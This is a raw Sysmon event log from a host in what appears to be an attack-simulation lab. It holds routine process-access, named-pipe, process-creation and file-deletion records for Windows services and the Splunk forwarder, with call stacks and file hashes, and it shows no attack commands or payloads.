12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.797{266CAFBE-646C-6064-1500-00000000AE01}13161668C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.735{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C2-6064-9600-00000000AE01}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64C2-6064-9600-00000000AE01}3000C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C2-6064-9600-00000000AE01}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.736{266CAFBE-64C2-6064-9600-00000000AE01}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000004156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.719{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD3BF10381FE59E9B6E8C53FA5A6CCFA,SHA256=0A69CA03D1E2F91A935F8168B4390277597886046AA5BE3F5B5B78DC2CB11116,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.595{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C71531616565867DF00EB3D5150A687,SHA256=2840221976C1B5084339D6E0DFC924200CE44A3C153365C78ABD3E74D7A71823,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.532{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.532{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.532{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.532{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System3
2\KERNEL32.DLL+84d4 10341000x80000000000000004148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x80000000000000004147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:10.454{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000004143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:10.423{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 18141800x80000000000000004142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:10.392{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
